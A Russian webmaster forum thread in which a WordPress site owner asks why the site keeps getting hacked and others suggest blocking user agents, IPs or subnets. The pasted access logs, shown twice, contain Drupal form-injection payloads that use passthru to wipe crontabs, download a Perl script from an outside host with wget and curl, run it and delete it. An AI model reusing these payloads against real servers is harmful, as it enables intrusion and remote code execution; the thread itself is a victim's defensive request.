Взламывают сайт на WP

P1
На сайте с 23.04.2016
Offline
26
4306

Приветствую.

Хочу разобраться в чем причина, вообщем взламывают сайт с регулярной частотой, но не могу найти причину. Восстанавливаю из бекапа, а его опять ломают.

Вот что в логах:


31.184.194.114 - - [21/Mar/2019:06:36:26 +0300] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20crontab%20-r&name[%23type]=markup HTTP/1.1" 200 11092 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:29 +0300] "POST /?q=file/ajax/name/%23value/ HTTP/1.1" 200 20301 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:31 +0300] "POST /user/password/?name[%23post_render][]=passthru&name[%23markup]=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20crontab%20-r&name[%23type]=markup HTTP/1.1" 404 9529 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:32 +0300] "POST /file/ajax/name/%23value/ HTTP/1.1" 404 9420 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:34 +0300] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 9420 "-" "Ruby"

После такого запроса на сайте появляется ошибка Warning: trim() expects parameter 1 to be string, array given in

/var/www/admin/data/www/site.ru/wp-includes/class-wp-query.php on line 755

Не знаю что там этот тип подбирает но у него это удачно получается, может есть у кого какие соображения на этот счет

SyS Admin KxK
На сайте с 30.01.2005
Offline
985
#1

partos_1, Забанить всех с юзер агентом Ruby и да у нас такие все в бане:)

Купить вечный впс (https://ddosov.net/lifetime-vds)
M2
На сайте с 11.01.2011
Offline
321
#2

whois 31.184.194.114
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '31.184.192.0 - 31.184.199.255'

% Abuse contact for '31.184.192.0 - 31.184.199.255' is 'abuse@pinspb.ru'

inetnum: 31.184.192.0 - 31.184.199.255
netname: PIN-DATACENTER-NET
descr: public vlans of DC
country: RU
org: ORG-PINl1-RIPE
admin-c: PIN44050-RIPE
tech-c: PIN44050-RIPE
mnt-routes: MNT-PINSUPPORT
status: ASSIGNED PA
mnt-by: MNT-PIN
mnt-domains: MNT-PINSUPPORT
mnt-by: MNT-PINSUPPORT

Серьезный повод задуматься одному хостеру с форума.... его клиенты сайты ломают, а ему хоть бы хны....

------------------- Крутые VPS и дедики. Качество по разумной цене (http://cp.inferno.name/view.php?product=1212&gid=1) VPS25OFF - скидка 25% на первый платеж по ссылке выше
P1
На сайте с 23.04.2016
Offline
26
#3
kxk:
partos_1, Забанить всех с юзер агентом Ruby и да у нас такие все в бане:)

А как это сделать в ispmanager lite 5?

SyS Admin KxK
На сайте с 30.01.2005
Offline
985
#4

partos_1, Вручную через хтакцесс например

---------- Добавлено 21.03.2019 в 13:17 ----------

mark2011, Есть ещё Depo40 и alexx.person (route to AS48666) тоже спаммеры хакеры 10 левела

S
На сайте с 30.09.2016
Offline
459
#5
kxk:
Забанить всех с юзер агентом Ruby

Подставят любой другой юзерагент и будут ломать дальше.

Если забанить IP - будут ломать с другого IP.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
SyS Admin KxK
На сайте с 30.01.2005
Offline
985
#6

Sitealert, Как показывает опыт, при списке более 30 сигнатур их обходит 1-2 взломщика ибо большинство долбят готовыми скриптами с фиксированными списками юзер агентов какие в живой природе не встречаються:)

S
На сайте с 30.09.2016
Offline
459
#7
kxk:
большинство долбят готовыми скриптами с фиксированными списками юзер агентов

Ну это когда на автомате проверяют миллион сайтов. А когда уже произошёл удачный взлом, а потом вдруг отказ - могут и перенастроить. Потому как сайт уже попал в базу взломанных.

trahtor
На сайте с 06.12.2005
Offline
395
#8
partos_1:
Приветствую.
Хочу разобраться в чем причина, вообщем взламывают сайт с регулярной частотой, но не могу найти причину. Восстанавливаю из бекапа, а его опять ломают.
Вот что в логах:

31.184.194.114 - - [21/Mar/2019:06:36:26 +0300] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20crontab%20-r&name[%23type]=markup HTTP/1.1" 200 11092 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:29 +0300] "POST /?q=file/ajax/name/%23value/ HTTP/1.1" 200 20301 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:31 +0300] "POST /user/password/?name[%23post_render][]=passthru&name[%23markup]=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20crontab%20-r&name[%23type]=markup HTTP/1.1" 404 9529 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:32 +0300] "POST /file/ajax/name/%23value/ HTTP/1.1" 404 9420 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:34 +0300] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 9420 "-" "Ruby"


После такого запроса на сайте появляется ошибка Warning: trim() expects parameter 1 to be string, array given in
/var/www/admin/data/www/site.ru/wp-includes/class-wp-query.php on line 755



Не знаю что там этот тип подбирает но у него это удачно получается, может есть у кого какие соображения на этот счет

Восстановить из бекапа не достаточно, надо найти, через что ломают, закрыть дырку и поменять доступа.

M2
На сайте с 11.01.2011
Offline
321
#9
Sitealert:
Если забанить IP

Я ищу по whois этот IP, вычисляю сетку и баню всю сетку сразу, к которой этот IP принадлежит.

neoks
На сайте с 17.03.2010
Offline
140
#10

mark2011, Сетки легко меняются, сегодня он на одной сети а через неделю на другой.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий